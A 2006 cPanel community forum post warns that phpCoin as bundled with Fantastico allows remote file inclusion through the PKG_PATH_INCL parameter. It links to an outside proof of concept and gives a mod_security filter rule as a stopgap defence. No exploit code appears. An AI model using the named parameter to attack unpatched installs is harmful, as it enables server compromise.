Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

SECURITY ISSUE: phpCoin Remote File Include Vuln

Discussion in 'Security' started by cmeisinger, Aug 26, 2006.

  1. cmeisinger

    cmeisinger Registered

    Joined:
    Nov 29, 2004
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    151
    The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

    Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt

    Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your modsecurty configuration.



    SecFilter "PKG_PATH_INCL"



    That should take care of it until Fantastico/PHPCoin releases an update.

    Chris Meisinger
    WingSix Hosting
    www.wingsix.com


    edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

    Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now i'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
     
    #1 cmeisinger, Aug 26, 2006
    Last edited: Aug 26, 2006
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice